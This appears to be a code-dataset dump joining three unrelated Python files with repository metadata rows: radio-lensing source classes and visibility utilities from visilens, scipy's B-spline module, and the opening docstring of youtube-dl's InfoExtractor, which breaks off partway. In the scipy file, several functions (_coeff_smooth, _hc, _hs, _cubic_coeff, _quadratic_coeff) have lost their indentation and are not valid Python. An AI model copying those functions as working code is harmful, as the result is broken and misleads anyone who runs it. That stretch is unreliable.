                ('PA', PA, [0., 180.]))
        params = {}
        for name, par, prior in spec:
            if not isinstance(par, dict):
                # Promote a bare number to a full parameter dict.
                par = {'value': par, 'fixed': False, 'prior': prior}
            params[name] = (par, prior)
        # Require a 'value' key on every dict BEFORE backfilling anything,
        # matching the original all-or-nothing validation.
        if not all('value' in par for par, _ in params.values()):
            raise KeyError("All parameter dicts must contain the key 'value'.")
        # Backfill any missing bookkeeping keys (mutates caller dicts in place).
        for par, prior in params.values():
            par.setdefault('fixed', False)
            par.setdefault('prior', prior)
        self.z = z
        self.lensed = lensed
        self.xoff = params['xoff'][0]
        self.yoff = params['yoff'][0]
        self.flux = params['flux'][0]
        self.majax = params['majax'][0]
        self.index = params['index'][0]
        self.axisratio = params['axisratio'][0]
        self.PA = params['PA'][0]
class GaussSource(object):
    """
    Circularly symmetric Gaussian light profile, with every variable
    parameter stored as a dict of the form
        x = {'value':x0,'fixed':False,'prior':[xmin,xmax]},
    where x0 is the initial/current value, 'fixed' says whether the
    parameter is held constant during fitting, and 'prior' bounds the
    allowed range.

    Parameters:
    z
        Source redshift. Can be made up, as long as it's higher than the
        lens redshift.
    lensed
        True/False flag determining whether this object is actually lensed
        (run through the lensing equations) or simply added to the model of
        the field without lensing. Also sets the position convention below.
    xoff, yoff
        Source position in arcseconds: relative to the (first) lens if
        lensed is True, otherwise relative to the field center. +x is west,
        +y is north.
    flux
        Total integrated flux density of the source (NOT peak pixel value),
        in Jy.
    width
        Gaussian width (sigma) of the light profile, in arcseconds.
    """

    def __init__(self, z, lensed=True, xoff=None, yoff=None, flux=None, width=None):
        # (name, passed value, default prior) for every fit parameter.
        spec = (('xoff', xoff, [-10., 10.]),
                ('yoff', yoff, [-10., 10.]),
                ('flux', flux, [1e-5, 1.]),   # ~0.01 mJy to 1 Jy source
                ('width', width, [0., 2.]))   # arcsec
        cleaned = {}
        for name, par, prior in spec:
            if not isinstance(par, dict):
                # Promote a bare number to a full parameter dict.
                par = {'value': par, 'fixed': False, 'prior': prior}
            cleaned[name] = (par, prior)
        # Validate all dicts before backfilling anything.
        if not all('value' in par for par, _ in cleaned.values()):
            raise KeyError("All parameter dicts must contain the key 'value'.")
        for par, prior in cleaned.values():
            par.setdefault('fixed', False)
            par.setdefault('prior', prior)
        self.z = z
        self.lensed = lensed
        self.xoff = cleaned['xoff'][0]
        self.yoff = cleaned['yoff'][0]
        self.flux = cleaned['flux'][0]
        self.width = cleaned['width'][0]
class PointSource(object):
    """
    An (unlensed) object unresolved by the data, with every variable
    parameter stored as a dict of the form
        x = {'value':x0,'fixed':False,'prior':[xmin,xmax]},
    where x0 is the initial/current value, 'fixed' says whether the
    parameter is held constant during fitting, and 'prior' bounds the
    allowed range.

    NOTE: Having a lensed point source is not currently implemented.

    Parameters:
    z
        Source redshift. Can be made up, as long as it's higher than the
        lens redshift.
    lensed
        True/False flag determining whether this object should be lensed;
        must effectively be False (see NOTE above).
    xoff, yoff
        Source position in arcseconds relative to the field center (or
        (0,0) coordinates). +x is west, +y is north.
    flux
        Total flux density of the source, in Jy.
    """

    def __init__(self, z, lensed=True, xoff=None, yoff=None, flux=None):
        # (name, passed value, default prior) for every fit parameter.
        spec = (('xoff', xoff, [-10., 10.]),
                ('yoff', yoff, [-10., 10.]),
                ('flux', flux, [1e-5, 1.]))   # ~0.01 mJy to 1 Jy source
        cleaned = {}
        for name, par, prior in spec:
            if not isinstance(par, dict):
                # Promote a bare number to a full parameter dict.
                par = {'value': par, 'fixed': False, 'prior': prior}
            cleaned[name] = (par, prior)
        # Validate all dicts before backfilling anything.
        if not all('value' in par for par, _ in cleaned.values()):
            raise KeyError("All parameter dicts must contain the key 'value'.")
        for par, prior in cleaned.values():
            par.setdefault('fixed', False)
            par.setdefault('prior', prior)
        self.z = z
        self.lensed = lensed
        self.xoff = cleaned['xoff'][0]
        self.yoff = cleaned['yoff'][0]
        self.flux = cleaned['flux'][0]
def read_visdata(filename):
    """
    Read visibility data from a file and wrap it in a Visdata object.

    So far only .bin files from get_visibilities.py are supported; idea is
    eventually to be able to not mess with that and get straight from a CASA
    ms, but don't currently know how to do that without bundling the casacore
    utilities directly...

    Params:
    filename
        Name of file to read from. Should contain all the visibility data
        needed, including u (Lambda), v (Lambda), real, imag, sigma,
        antenna1, and antenna 2.

    Returns:
    visdata
        A Visdata object containing the data from filename.
    """
    if not filename.split('.')[-1].lower() in ['bin']:
        raise ValueError('Only .bin files are supported for now...')
    raw = np.fromfile(filename)
    # The last element is the primary-beam FWHM; the rest are seven stacked
    # columns (flat .bin files lose the array shape, so restore it here).
    PBfwhm, raw = raw[-1], raw[:-1]
    columns = raw.reshape(7, raw.size // 7)
    vis = Visdata(*columns, PBfwhm=PBfwhm, filename=filename)
    # Drop autocorrelations (u == v == 0), if any.
    if (vis.u == 0).sum() > 0:
        warnings.warn("Found autocorrelations when reading the data (u == v == 0); removing them...")
        keep = ~(vis.u == 0)
        vis = Visdata(vis.u[keep], vis.v[keep], vis.real[keep], vis.imag[keep],
                      vis.sigma[keep], vis.ant1[keep], vis.ant2[keep],
                      vis.PBfwhm, vis.filename)
    # Drop flagged / otherwise bad points (zero amplitude), if any.
    if (vis.amp == 0).sum() > 0:
        warnings.warn("Found flagged/bad data when reading the data (amplitude == 0); removing them...")
        keep = ~(vis.amp == 0)
        vis = Visdata(vis.u[keep], vis.v[keep], vis.real[keep], vis.imag[keep],
                      vis.sigma[keep], vis.ant1[keep], vis.ant2[keep],
                      vis.PBfwhm, vis.filename)
    return vis
def concatvis(visdatas):
    """
    Concatenate multiple visibility sets into one larger set.
    Does no consistency checking of any kind, so beware.

    :param visdatas:
        List of visdata objects

    This method returns:
    * ``concatvis'' - The concatenated visibility set.
    """
    # Concatenate each per-visibility column across all input sets. Seeding
    # every concatenation with an empty float array reproduces the dtype
    # promotion of the original accumulate-from-np.array([]) loop.
    columns = [np.concatenate([np.array([])] + [getattr(vis, attr) for vis in visdatas])
               for attr in ('u', 'v', 'real', 'imag', 'sigma', 'ant1', 'ant2')]
    # PBfwhm is taken from the first set; no check that the others match.
    return Visdata(*columns, PBfwhm=visdatas[0].PBfwhm, filename='Combined Data')
def bin_visibilities(visdata, maxnewsize=None):
    """
    WARNING: DOESN'T WORK CURRENTLY(?)

    Bins up (ie, averages down) visibilities to reduce the total
    number of them. Note that since we fit directly to the visibilities,
    this is slightly different (and easier) than gridding in preparation for
    imaging, as we won't need to FFT and so don't need a convolution function.

    :param visdata
        A Visdata object.
    :param maxnewsize = None
        If desired, the maximum number of visibilities post-binning can
        be specified. As long as this number meets other criteria (ie,
        we don't have bin sizes smaller than an integration time or
        bandwidth in wavelengths), the total number in the returned
        Visdata will have fewer than maxnewsize visibilities.

    This method returns:
    * ``BinnedVisibilities'' - A Visdata object containing binned visibilities.
    """
    # BUG FIX: `stats` was used below but never imported anywhere in this
    # module; import it locally so the function can actually run.
    from scipy import stats

    if maxnewsize is None: maxnewsize = visdata.u.size/2
    # Bins should be larger than an integration; strictly only valid for an EW array,
    # and assumes a 20s integration time. Thus, this is a conservative estimate.
    minbinsize = 20. * visdata.uvdist.max() / (24*3600.)
    # Bins should be smaller than the effective field size
    maxbinsize = (visdata.PBfwhm * arcsec2rad)**-1
    print(minbinsize, maxbinsize)  # debug output
    # We're going to find a binning solution iteratively; this gets us set up
    Nbins, binsizeunmet, Nvis, it, maxiter = [3000, 3000], True, visdata.u.size, 0, 250
    while (binsizeunmet or Nvis >= maxnewsize):
        print(Nbins)  # debug output
        # Figure out how to bin up the data
        counts, uedges, vedges, bins = stats.binned_statistic_2d(
              visdata.u, visdata.v, values=visdata.real, statistic='count',
              bins=Nbins)
        du, dv = uedges[1]-uedges[0], vedges[1]-vedges[0]
        # Check that our bins in u and v meet our conditions
        if (du > minbinsize and du < maxbinsize and
            dv > minbinsize and dv < maxbinsize): binsizeunmet = False
        # Otherwise we have to adjust the number of bins to adjust their size...
        elif du <= minbinsize: Nbins[0] = int(Nbins[0]/1.1); binsizeunmet = True
        elif dv <= minbinsize: Nbins[1] = int(Nbins[1]/1.1); binsizeunmet = True
        elif du >= maxbinsize: Nbins[0] = int(Nbins[0]*1.1); binsizeunmet = True
        elif dv >= maxbinsize: Nbins[1] = int(Nbins[1]*1.1); binsizeunmet = True
        # If we still have more than the desired number of visibilities, make
        # fewer bins (we'll loop after this).
        if np.unique(bins).size > maxnewsize: Nbins[0], Nbins[1] = int(Nbins[0]/1.1), int(Nbins[1]/1.1)
        Nvis = np.unique(bins).size
        it += 1
        if it > maxiter: raise ValueError("It's impossible to split your data into that few bins! "
                                          "Try setting maxnewsize to a larger value!")
    print(Nvis, du, dv)  # debug output
    # Get us some placeholder arrays for the binned data
    u, v, real, imag, sigma, ant1, ant2 = np.zeros((7, Nvis))
    for i, filledbin in enumerate(np.unique(bins)):
        # This tells us which visibilities belong to the current bin
        points = np.where(bins == filledbin)[0]
        # This unravels the indices to uedges,vedges from the binned_statistic binnumber
        uloc = int(np.floor(filledbin/(vedges.size+1)) - 1)
        vloc = int(filledbin - (vedges.size+1)*(uloc+1) - 1)
        # Get our new data, place at center of uv bins
        u[i], v[i] = uedges[uloc]+0.5*du, vedges[vloc]+0.5*dv
        # Inverse-variance weighted averages of the binned points.
        real[i], sumwt = np.average(visdata.real[points], weights=visdata.sigma[points]**-2., returned=True)
        imag[i] = np.average(visdata.imag[points], weights=visdata.sigma[points]**-2.)
        sigma[i] = sumwt**-0.5
        # We can keep the antenna numbers if we've only selected points from the same baseline,
        # otherwise get rid of them (CHECK IF MODELCAL FAILS WITH None ANTENNAS)
        ant1[i] = visdata.ant1[points][0] if (visdata.ant1[points] == visdata.ant1[points][0]).all() else None
        ant2[i] = visdata.ant2[points][0] if (visdata.ant2[points] == visdata.ant2[points][0]).all() else None
    return Visdata(u, v, real, imag, sigma, ant1, ant2, visdata.PBfwhm, 'BIN{0}'.format(Nvis)+visdata.filename)
|
jspilker/visilens
|
visilens/class_utils.py
|
Python
|
mit
| 32,136
|
[
"Gaussian"
] |
149843eb03e30fc0a2ad74bbf7bc6539126517c55cf060d3400826fedbb12381
|
from __future__ import division, print_function, absolute_import
from scipy._lib.six import xrange
from numpy import (logical_and, asarray, pi, zeros_like,
piecewise, array, arctan2, tan, zeros, arange, floor)
from numpy.core.umath import (sqrt, exp, greater, less, cos, add, sin,
less_equal, greater_equal)
# From splinemodule.c
from .spline import cspline2d, sepfir2d
from scipy.special import comb, gamma
__all__ = ['spline_filter', 'bspline', 'gauss_spline', 'cubic', 'quadratic',
'cspline1d', 'qspline1d', 'cspline1d_eval', 'qspline1d_eval']
def factorial(n):
    """Real-valued factorial via the gamma function: n! = gamma(n + 1)."""
    return gamma(n + 1)
def spline_filter(Iin, lmbda=5.0):
    """Smoothing spline (cubic) filtering of a rank-2 array.

    Filter an input data set, `Iin`, using a (cubic) smoothing spline of
    fall-off `lmbda`.
    """
    intype = Iin.dtype.char
    # Separable cubic B-spline reconstruction kernel.
    kernel = array([1.0, 4.0, 1.0], 'f') / 6.0
    if intype in ['F', 'D']:
        # Complex input: smooth real and imaginary parts independently
        # (in single-precision complex, as the original code did).
        Iin = Iin.astype('F')
        smoothed_re = sepfir2d(cspline2d(Iin.real, lmbda), kernel, kernel)
        smoothed_im = sepfir2d(cspline2d(Iin.imag, lmbda), kernel, kernel)
        out = (smoothed_re + 1j * smoothed_im).astype(intype)
    elif intype in ['f', 'd']:
        out = sepfir2d(cspline2d(Iin, lmbda), kernel, kernel)
        out = out.astype(intype)
    else:
        raise TypeError("Invalid data type for Iin")
    return out
# Memoizes (funclist, condfuncs) per spline order so repeated bspline()
# calls don't rebuild the piecewise functions.
_splinefunc_cache = {}

def _bspline_piecefunctions(order):
    """Returns the function defined over the left-side pieces for a bspline of
    a given order.
    The 0th piece is the first one less than 0. The last piece is a function
    identical to 0 (returned as the constant 0). (There are order//2 + 2 total
    pieces).
    Also returns the condition functions that when evaluated return boolean
    arrays for use with `numpy.piecewise`.
    """
    try:
        return _splinefunc_cache[order]
    except KeyError:
        pass

    def condfuncgen(num, val1, val2):
        # num selects the piece type: 0 = the piece touching x == 0 (interval
        # closed on both sides), 2 = the final open-ended piece, anything
        # else = an interior piece (half-open interval).
        if num == 0:
            return lambda x: logical_and(less_equal(x, val1),
                                         greater_equal(x, val2))
        elif num == 2:
            return lambda x: less_equal(x, val2)
        else:
            return lambda x: logical_and(less(x, val1),
                                         greater_equal(x, val2))
    last = order // 2 + 2
    # Piece boundaries start at -1.0 for odd orders and -0.5 for even ones.
    if order % 2:
        startbound = -1.0
    else:
        startbound = -0.5
    condfuncs = [condfuncgen(0, 0, startbound)]
    bound = startbound
    for num in xrange(1, last - 1):
        condfuncs.append(condfuncgen(1, bound, bound - 1))
        bound = bound - 1
    condfuncs.append(condfuncgen(2, 0, -(order + 1) / 2.0))
    # final value of bound is used in piecefuncgen below
    # the functions to evaluate are taken from the left-hand-side
    # in the general expression derived from the central difference
    # operator (because they involve fewer terms).
    fval = factorial(order)

    def piecefuncgen(num):
        Mk = order // 2 - num
        if (Mk < 0):
            return 0  # final function is 0
        # Alternating-sign binomial coefficients of the central-difference
        # expansion of the B-spline, normalized by order!.
        coeffs = [(1 - 2 * (k % 2)) * float(comb(order + 1, k, exact=1)) / fval
                  for k in xrange(Mk + 1)]
        # NOTE: `bound` here is the FINAL value left by the loop above
        # (deliberate late binding), so all pieces are shifted relative to
        # the leftmost boundary.
        shifts = [-bound - k for k in xrange(Mk + 1)]

        def thefunc(x):
            res = 0.0
            for k in range(Mk + 1):
                res += coeffs[k] * (x + shifts[k]) ** order
            return res
        return thefunc
    funclist = [piecefuncgen(k) for k in xrange(last)]
    # Cache before returning; subsequent calls for this order are O(1).
    _splinefunc_cache[order] = (funclist, condfuncs)
    return funclist, condfuncs
def bspline(x, n):
    """B-spline basis function of order n.

    Notes
    -----
    Uses numpy.piecewise and automatic function-generator.
    """
    # B-splines are symmetric, so evaluate on -|x|: only the left-side
    # pieces (as produced by _bspline_piecefunctions) are ever needed.
    mirrored = -abs(asarray(x))
    funclist, condfuncs = _bspline_piecefunctions(n)
    condlist = [cond(mirrored) for cond in condfuncs]
    return piecewise(mirrored, condlist, funclist)
def gauss_spline(x, n):
    """Gaussian approximation to B-spline basis function of order n."""
    # The order-n B-spline tends to a Gaussian with variance (n+1)/12.
    variance = (n + 1) / 12.0
    norm = 1 / sqrt(2 * pi * variance)
    return norm * exp(-x ** 2 / 2 / variance)
def cubic(x):
    """A cubic B-spline.

    This is a special case of `bspline`, and equivalent to ``bspline(x, 3)``.
    """
    ax = abs(asarray(x))
    res = zeros_like(ax)
    # Central piece: |x| < 1.
    inner = less(ax, 1)
    if inner.any():
        a = ax[inner]
        res[inner] = 2.0 / 3 - 1.0 / 2 * a ** 2 * (2 - a)
    # Outer piece: 1 <= |x| < 2 (zero beyond that).
    outer = ~inner & less(ax, 2)
    if outer.any():
        a = ax[outer]
        res[outer] = 1.0 / 6 * (2 - a) ** 3
    return res
def quadratic(x):
    """A quadratic B-spline.

    This is a special case of `bspline`, and equivalent to ``bspline(x, 2)``.
    """
    ax = abs(asarray(x))
    res = zeros_like(ax)
    # Central piece: |x| < 0.5.
    center = less(ax, 0.5)
    if center.any():
        a = ax[center]
        res[center] = 0.75 - a ** 2
    # Wing piece: 0.5 <= |x| < 1.5 (zero beyond that).
    wings = ~center & less(ax, 1.5)
    if wings.any():
        a = ax[wings]
        res[wings] = (a - 1.5) ** 2 / 2.0
    return res
def _coeff_smooth(lam):
xi = 1 - 96 * lam + 24 * lam * sqrt(3 + 144 * lam)
omeg = arctan2(sqrt(144 * lam - 1), sqrt(xi))
rho = (24 * lam - 1 - sqrt(xi)) / (24 * lam)
rho = rho * sqrt((48 * lam + 24 * lam * sqrt(3 + 144 * lam)) / xi)
return rho, omeg
def _hc(k, cs, rho, omega):
return (cs / sin(omega) * (rho ** k) * sin(omega * (k + 1)) *
greater(k, -1))
def _hs(k, cs, rho, omega):
c0 = (cs * cs * (1 + rho * rho) / (1 - rho * rho) /
(1 - 2 * rho * rho * cos(2 * omega) + rho ** 4))
gamma = (1 - rho * rho) / (1 + rho * rho) / tan(omega)
ak = abs(k)
return c0 * rho ** ak * (cos(omega * ak) + gamma * sin(omega * ak))
def _cubic_smooth_coeff(signal, lamb):
    """Smoothing cubic-spline coefficients via a second-order recursive filter.

    A causal forward pass builds ``yp`` and an anti-causal backward pass
    builds the result ``y``; both recursions are initialized from truncated
    impulse-response sums (_hc / _hs) evaluated against the (reversed)
    signal, implementing mirror-symmetric boundary handling.
    """
    rho, omega = _coeff_smooth(lamb)
    cs = 1 - 2 * rho * cos(omega) + rho * rho
    K = len(signal)
    yp = zeros((K,), signal.dtype.char)
    k = arange(K)
    # Causal initialization of the first two samples from the impulse response.
    yp[0] = (_hc(0, cs, rho, omega) * signal[0] +
             add.reduce(_hc(k + 1, cs, rho, omega) * signal))
    yp[1] = (_hc(0, cs, rho, omega) * signal[0] +
             _hc(1, cs, rho, omega) * signal[1] +
             add.reduce(_hc(k + 2, cs, rho, omega) * signal))
    # Second-order forward recursion.
    for n in range(2, K):
        yp[n] = (cs * signal[n] + 2 * rho * cos(omega) * yp[n - 1] -
                 rho * rho * yp[n - 2])
    y = zeros((K,), signal.dtype.char)
    # Anti-causal initialization of the last two samples (reversed signal).
    y[K - 1] = add.reduce((_hs(k, cs, rho, omega) +
                           _hs(k + 1, cs, rho, omega)) * signal[::-1])
    y[K - 2] = add.reduce((_hs(k - 1, cs, rho, omega) +
                           _hs(k + 2, cs, rho, omega)) * signal[::-1])
    # Second-order backward recursion driven by the forward-pass output.
    for n in range(K - 3, -1, -1):
        y[n] = (cs * yp[n] + 2 * rho * cos(omega) * y[n + 1] -
                rho * rho * y[n + 2])
    return y
def _cubic_coeff(signal):
zi = -2 + sqrt(3)
K = len(signal)
yplus = zeros((K,), signal.dtype.char)
powers = zi ** arange(K)
yplus[0] = signal[0] + zi * add.reduce(powers * signal)
for k in range(1, K):
yplus[k] = signal[k] + zi * yplus[k - 1]
output = zeros((K,), signal.dtype)
output[K - 1] = zi / (zi - 1) * yplus[K - 1]
for k in range(K - 2, -1, -1):
output[k] = zi * (output[k + 1] - yplus[k])
return output * 6.0
def _quadratic_coeff(signal):
zi = -3 + 2 * sqrt(2.0)
K = len(signal)
yplus = zeros((K,), signal.dtype.char)
powers = zi ** arange(K)
yplus[0] = signal[0] + zi * add.reduce(powers * signal)
for k in range(1, K):
yplus[k] = signal[k] + zi * yplus[k - 1]
output = zeros((K,), signal.dtype.char)
output[K - 1] = zi / (zi - 1) * yplus[K - 1]
for k in range(K - 2, -1, -1):
output[k] = zi * (output[k + 1] - yplus[k])
return output * 8.0
def cspline1d(signal, lamb=0.0):
    """
    Compute cubic spline coefficients for rank-1 array.

    Find the cubic spline coefficients for a 1-D signal assuming
    mirror-symmetric boundary conditions. To obtain the signal back from the
    spline representation mirror-symmetric-convolve these coefficients with a
    length 3 FIR window [1.0, 4.0, 1.0]/ 6.0 .

    Parameters
    ----------
    signal : ndarray
        A rank-1 array representing samples of a signal.
    lamb : float, optional
        Smoothing coefficient, default is 0.0.

    Returns
    -------
    c : ndarray
        Cubic spline coefficients.

    """
    # Dispatch on the smoothing coefficient: the smoothed variant uses a
    # different recursive filter than the exact (lamb == 0) one.
    if lamb == 0.0:
        return _cubic_coeff(signal)
    return _cubic_smooth_coeff(signal, lamb)
def qspline1d(signal, lamb=0.0):
    """Compute quadratic spline coefficients for rank-1 array.

    Find the quadratic spline coefficients for a 1-D signal assuming
    mirror-symmetric boundary conditions. To obtain the signal back from the
    spline representation mirror-symmetric-convolve these coefficients with a
    length 3 FIR window [1.0, 6.0, 1.0]/ 8.0 .

    Parameters
    ----------
    signal : ndarray
        A rank-1 array representing samples of a signal.
    lamb : float, optional
        Smoothing coefficient (must be zero for now).

    Returns
    -------
    c : ndarray
        Quadratic spline coefficients.

    Raises
    ------
    ValueError
        If `lamb` is nonzero (smoothing is not implemented for
        quadratic splines).
    """
    if lamb != 0.0:
        raise ValueError("Smoothing quadratic splines not supported yet.")
    else:
        return _quadratic_coeff(signal)
def cspline1d_eval(cj, newx, dx=1.0, x0=0):
    """Evaluate a spline at the new set of points.

    `dx` is the old sample-spacing while `x0` was the old origin. In
    other-words the old-sample points (knot-points) for which the `cj`
    represent spline coefficients were at equally-spaced points of:

      oldx = x0 + j*dx  j=0...N-1, with N=len(cj)

    Edges are handled using mirror-symmetric boundary conditions.

    """
    # Map the evaluation points onto knot-index coordinates.
    newx = (asarray(newx) - x0) / float(dx)
    res = zeros_like(newx, dtype=cj.dtype)
    if res.size == 0:
        return res
    N = len(cj)
    # Points left of the domain, right of the domain, and inside it.
    cond1 = newx < 0
    cond2 = newx > (N - 1)
    cond3 = ~(cond1 | cond2)
    # handle general mirror-symmetry
    res[cond1] = cspline1d_eval(cj, -newx[cond1])
    res[cond2] = cspline1d_eval(cj, 2 * (N - 1) - newx[cond2])
    newx = newx[cond3]
    if newx.size == 0:
        return res
    result = zeros_like(newx, dtype=cj.dtype)
    # Each point is influenced by the 4 nearest cubic-spline knots.
    jlower = floor(newx - 2).astype(int) + 1
    for i in range(4):
        thisj = jlower + i
        indj = thisj.clip(0, N - 1)  # handle edge cases
        result += cj[indj] * cubic(newx - thisj)
    res[cond3] = result
    return res
def qspline1d_eval(cj, newx, dx=1.0, x0=0):
    """Evaluate a quadratic spline at the new set of points.

    `dx` is the old sample-spacing while `x0` was the old origin. In
    other-words the old-sample points (knot-points) for which the `cj`
    represent spline coefficients were at equally-spaced points of::

      oldx = x0 + j*dx  j=0...N-1, with N=len(cj)

    Edges are handled using mirror-symmetric boundary conditions.

    """
    # Map the evaluation points onto knot-index coordinates.
    newx = (asarray(newx) - x0) / dx
    # Allocate with the coefficients' dtype (matching cspline1d_eval):
    # a plain zeros_like(newx) would silently drop the imaginary part
    # when `cj` is complex.
    res = zeros_like(newx, dtype=cj.dtype)
    if res.size == 0:
        return res
    N = len(cj)
    # Points left of the domain, right of the domain, and inside it.
    cond1 = newx < 0
    cond2 = newx > (N - 1)
    cond3 = ~(cond1 | cond2)
    # handle general mirror-symmetry
    res[cond1] = qspline1d_eval(cj, -newx[cond1])
    res[cond2] = qspline1d_eval(cj, 2 * (N - 1) - newx[cond2])
    newx = newx[cond3]
    if newx.size == 0:
        return res
    result = zeros_like(newx, dtype=cj.dtype)
    # Each point is influenced by the 3 nearest quadratic-spline knots.
    jlower = floor(newx - 1.5).astype(int) + 1
    for i in range(3):
        thisj = jlower + i
        indj = thisj.clip(0, N - 1)  # handle edge cases
        result += cj[indj] * quadratic(newx - thisj)
    res[cond3] = result
    return res
|
mbayon/TFG-MachineLearning
|
venv/lib/python3.6/site-packages/scipy/signal/bsplines.py
|
Python
|
mit
| 11,615
|
[
"Gaussian"
] |
8d1dbf5f5166abfbc95763c58f2749bb92236af3b3e059cd36f42d263db501d4
|
# coding: utf-8
from __future__ import unicode_literals
import base64
import datetime
import hashlib
import json
import netrc
import os
import random
import re
import socket
import sys
import time
import math
from ..compat import (
compat_cookiejar,
compat_cookies,
compat_etree_fromstring,
compat_getpass,
compat_integer_types,
compat_http_client,
compat_os_name,
compat_str,
compat_urllib_error,
compat_urllib_parse_unquote,
compat_urllib_parse_urlencode,
compat_urllib_request,
compat_urlparse,
compat_xml_parse_error,
)
from ..downloader.f4m import (
get_base_url,
remove_encrypted_media,
)
from ..utils import (
NO_DEFAULT,
age_restricted,
base_url,
bug_reports_message,
clean_html,
compiled_regex_type,
determine_ext,
determine_protocol,
error_to_compat_str,
ExtractorError,
extract_attributes,
fix_xml_ampersands,
float_or_none,
GeoRestrictedError,
GeoUtils,
int_or_none,
js_to_json,
JSON_LD_RE,
mimetype2ext,
orderedSet,
parse_codecs,
parse_duration,
parse_iso8601,
parse_m3u8_attributes,
RegexNotFoundError,
sanitized_Request,
sanitize_filename,
unescapeHTML,
unified_strdate,
unified_timestamp,
update_Request,
update_url_query,
urljoin,
url_basename,
xpath_element,
xpath_text,
xpath_with_ns,
)
class InfoExtractor(object):
"""Information Extractor class.
Information extractors are the classes that, given a URL, extract
information about the video (or videos) the URL refers to. This
information includes the real video URL, the video title, author and
others. The information is stored in a dictionary which is then
passed to the YoutubeDL. The YoutubeDL processes this
information possibly downloading the video to the file system, among
other possible outcomes.
The type field determines the type of the result.
By far the most common value (and the default if _type is missing) is
"video", which indicates a single video.
For a video, the dictionaries must include the following fields:
id: Video identifier.
title: Video title, unescaped.
Additionally, it must contain either a formats entry or a url one:
formats: A list of dictionaries for each format available, ordered
from worst to best quality.
Potential fields:
* url Mandatory. The URL of the video file
* manifest_url
The URL of the manifest file in case of
fragmented media (DASH, hls, hds)
* ext Will be calculated from URL if missing
* format A human-readable description of the format
("mp4 container with h264/opus").
Calculated from the format_id, width, height.
and format_note fields if missing.
* format_id A short description of the format
("mp4_h264_opus" or "19").
Technically optional, but strongly recommended.
* format_note Additional info about the format
("3D" or "DASH video")
* width Width of the video, if known
* height Height of the video, if known
* resolution Textual description of width and height
* tbr Average bitrate of audio and video in KBit/s
* abr Average audio bitrate in KBit/s
* acodec Name of the audio codec in use
* asr Audio sampling rate in Hertz
* vbr Average video bitrate in KBit/s
* fps Frame rate
* vcodec Name of the video codec in use
* container Name of the container format
* filesize The number of bytes, if known in advance
* filesize_approx An estimate for the number of bytes
* player_url SWF Player URL (used for rtmpdump).
* protocol The protocol that will be used for the actual
download, lower-case.
"http", "https", "rtsp", "rtmp", "rtmpe",
"m3u8", "m3u8_native" or "http_dash_segments".
* fragment_base_url
Base URL for fragments. Each fragment's path
value (if present) will be relative to
this URL.
* fragments A list of fragments of a fragmented media.
Each fragment entry must contain either an url
or a path. If an url is present it should be
considered by a client. Otherwise both path and
fragment_base_url must be present. Here is
the list of all potential fields:
* "url" - fragment's URL
* "path" - fragment's path relative to
fragment_base_url
* "duration" (optional, int or float)
* "filesize" (optional, int)
* preference Order number of this format. If this field is
present and not None, the formats get sorted
by this field, regardless of all other values.
-1 for default (order by other properties),
-2 or smaller for less than default.
< -1000 to hide the format (if there is
another one which is strictly better)
* language Language code, e.g. "de" or "en-US".
* language_preference Is this in the language mentioned in
the URL?
10 if it's what the URL is about,
-1 for default (don't know),
-10 otherwise, other values reserved for now.
* quality Order number of the video quality of this
format, irrespective of the file format.
-1 for default (order by other properties),
-2 or smaller for less than default.
* source_preference Order number for this video source
(quality takes higher priority)
-1 for default (order by other properties),
-2 or smaller for less than default.
* http_headers A dictionary of additional HTTP headers
to add to the request.
* stretched_ratio If given and not 1, indicates that the
video's pixels are not square.
width : height ratio as float.
* no_resume The server does not support resuming the
(HTTP or RTMP) download. Boolean.
* downloader_options A dictionary of downloader options as
described in FileDownloader
url: Final video URL.
ext: Video filename extension.
format: The video format, defaults to ext (used for --get-format)
player_url: SWF Player URL (used for rtmpdump).
The following fields are optional:
alt_title: A secondary title of the video.
display_id An alternative identifier for the video, not necessarily
unique, but available before title. Typically, id is
something like "4234987", title "Dancing naked mole rats",
and display_id "dancing-naked-mole-rats"
thumbnails: A list of dictionaries, with the following entries:
* "id" (optional, string) - Thumbnail format ID
* "url"
* "preference" (optional, int) - quality of the image
* "width" (optional, int)
* "height" (optional, int)
                    * "resolution" (optional, string "{width}x{height}",
deprecated)
* "filesize" (optional, int)
thumbnail: Full URL to a video thumbnail image.
description: Full video description.
uploader: Full name of the video uploader.
license: License name the video is licensed under.
creator: The creator of the video.
release_date: The date (YYYYMMDD) when the video was released.
timestamp: UNIX timestamp of the moment the video became available.
upload_date: Video upload date (YYYYMMDD).
If not explicitly set, calculated from timestamp.
uploader_id: Nickname or id of the video uploader.
uploader_url: Full URL to a personal webpage of the video uploader.
location: Physical location where the video was filmed.
subtitles: The available subtitles as a dictionary in the format
{tag: subformats}. "tag" is usually a language code, and
"subformats" is a list sorted from lower to higher
preference, each element is a dictionary with the "ext"
entry and one of:
* "data": The subtitles file contents
* "url": A URL pointing to the subtitles file
"ext" will be calculated from URL if missing
automatic_captions: Like 'subtitles', used by the YoutubeIE for
automatically generated captions
duration: Length of the video in seconds, as an integer or float.
view_count: How many users have watched the video on the platform.
like_count: Number of positive ratings of the video
dislike_count: Number of negative ratings of the video
repost_count: Number of reposts of the video
    average_rating: Average rating given by users, the scale used depends on the webpage
comment_count: Number of comments on the video
comments: A list of comments, each with one or more of the following
properties (all but one of text or html optional):
* "author" - human-readable name of the comment author
* "author_id" - user ID of the comment author
* "id" - Comment ID
* "html" - Comment as HTML
* "text" - Plain text of the comment
* "timestamp" - UNIX timestamp of comment
* "parent" - ID of the comment this one is replying to.
Set to "root" to indicate that this is a
comment to the original video.
age_limit: Age restriction for the video, as an integer (years)
webpage_url: The URL to the video webpage, if given to youtube-dl it
should allow to get the same result again. (It will be set
by YoutubeDL if it's missing)
categories: A list of categories that the video falls in, for example
["Sports", "Berlin"]
tags: A list of tags assigned to the video, e.g. ["sweden", "pop music"]
is_live: True, False, or None (=unknown). Whether this video is a
live stream that goes on instead of a fixed-length video.
start_time: Time in seconds where the reproduction should start, as
specified in the URL.
end_time: Time in seconds where the reproduction should end, as
specified in the URL.
chapters: A list of dictionaries, with the following entries:
* "start_time" - The start time of the chapter in seconds
* "end_time" - The end time of the chapter in seconds
* "title" (optional, string)
The following fields should only be used when the video belongs to some logical
chapter or section:
chapter: Name or title of the chapter the video belongs to.
chapter_number: Number of the chapter the video belongs to, as an integer.
chapter_id: Id of the chapter the video belongs to, as a unicode string.
The following fields should only be used when the video is an episode of some
series, programme or podcast:
series: Title of the series or programme the video episode belongs to.
season: Title of the season the video episode belongs to.
season_number: Number of the season the video episode belongs to, as an integer.
season_id: Id of the season the video episode belongs to, as a unicode string.
